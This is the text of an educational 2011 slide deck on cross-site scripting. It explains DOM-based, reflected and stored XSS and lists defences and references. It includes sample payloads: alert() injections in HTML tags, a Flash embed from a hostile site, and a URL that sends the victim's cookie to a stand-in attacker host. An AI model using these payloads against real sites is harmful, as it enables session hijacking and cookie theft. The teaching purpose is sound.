XSS2

Ashish Dhital
21st April 2011

Web sites are ubiquitous today
Immense popularity brings a variety of attacks
Mostly SQL Injection, DoS, XSS
XSS introduction, types, defense and conclusion







XSS exploits websites by inserting malicious client-side scripts into dynamic websites
Making use of browser vulnerabilities
Bypassing the same-origin policy enforced by the browser
Exploitation of HTML, JS, VBScript, ActiveX
Objective – session hijacking, redirection, stealing information
80% of attacks against websites today
In 2010, various XSS vulnerabilities were found in Amazon, eBay, PayPal, American Express
McAfee’s site has been shown to have XSS vulnerabilities (as of March 2011)

Examples of Insertion of Scripts in HTML Tags
<BODY ONLOAD=alert("evilmessage") />
<IMG SRC="javascript:alert('evilmessage')" />
<LINK REL="STYLESHEET" HREF="javascript:alert('evilmessage')" />
Flash Exploitation
<EMBED SRC="http://dangeroussite.com/evilflash.swf" AllowScriptAccess="always" />


DOM Based Attack

Reflected / Non-persistent Attack

Stored/ Persistent Attack


Exploitation of DOM Entities
document.location, document.URL, and document.referrer properties
Payload in the URL sent to unsuspecting users
http://www.genuinewebsite.com/getAC.php?username=<script>alert("harmful script")</script>

Unexpected/Undesired execution of client-side script




Most common form of XSS attack
Data provided by the web client is immediately echoed by the web server into the resulting page
Confirmation pages, error pages, search queries
Usually a malicious link delivered through social engineering techniques
Example:
http://www.genuinesite.com/getAc.php?username=<script>document.location='http://attackersite.example/cgibin/stolencookie.cgi?'+document.cookie</script>




Most powerful one in terms of the possible damage
Inserting malicious code into a form or input field, which is then stored on the server
Could infect other users and the web server, and propagate rapidly
Example:
The attacker inserts a script as a blog post (of course the input text is not filtered or sanitized).
A user who visits the site later clicks on the blog post. And the script executes!
Possible worm?



User Input Validation / Sanitization, Parameter Verification
Careful checking of the path from HTTP request to HTML output
Filtering out unnecessary characters using regular expressions
Example: filtering out anything that starts with <script>


Data verification for various properties of HTML tags like attribute, style, width
Cookie Protection
Cookie – holds information about the surfer
IP Address Verification (effective behind a proxy server?)
HttpOnly Flag
Possible Solution – Triple DES Encryption

Available Tools to Minimize XSS Attacks
Noxes: Windows-based firewall, configured for browser-based connections
Samurai
XJs

How can a user defend oneself from XSS attacks?
Disabling scripts when not required.
Avoid clicking on unknown sites, URLs, or message boards.
Accessing a site through its own address and not through third-party sites.
Keeping oneself updated about sites and message boards that have been blacklisted as malicious sites.




Preventive steps may work for vulnerabilities known today
Hackers are always at work to discover zero-day vulnerabilities
Web development teams should constantly update themselves
Security is an ongoing process!







Bodmer, Fabrice. Cross-Site Scripting (XSS). Tech. Computer and Network Security Seminar. Web. 12 Apr. 2011. <http://diuf.unifr.ch/drupal/tns/sites/diuf.unifr.ch.drupal.tns/files/Teaching/2006_2007/Computer_Security_Threats_and_Counter_Measures/Bodmer_CrossSiteScripting.pdf>.
Kirda, Engin, Christopher Kruegel, Giovanni Vigna, and Nenad Jovanovic. Noxes: A Client-Side Solution for Mitigating Cross-Site Scripting Attacks. Web. 12 Apr. 2011. <http://www.cs.ucsb.edu/~vigna/publications/2006_kirda_kruegel_vigna_jovanovic_SAC.pdf>.
Mohammadi, S., and Farhad Koohbor. Protecting Cookies against Cross-site Scripting Attacks Using Cryptography. WSEAS. Web. 12 Apr. 2011. <http://www.wseas.us/elibrary/conferences/2010/Merida/ISPACT/ISPACT-02.pdf>.
Sharma, Anand. "Prevent a Cross-Site Scripting Attack." IBM - United States. IBM, 03 Feb. 2004. Web. 12 Apr. 2011. <http://www.ibm.com/developerworks/web/library/wa-secxss/>.
"Cross-site Scripting (XSS) - OWASP." OWASP (Open Web Application Security Project). Fortify Software, 10 Oct. 2010. Web. 16 Apr. 2011. <https://www.owasp.org/index.php/Cross-site_Scripting_(XSS)>.
"Cross-site Scripting." Wikipedia, the Free Encyclopedia. Web. 17 Apr. 2011. <http://en.wikipedia.org/wiki/Cross-site_scripting>.
XSSed | Cross Site Scripting (XSS) Attacks Information and Archive. Web. 17 Apr. 2011. <http://www.xssed.com/>.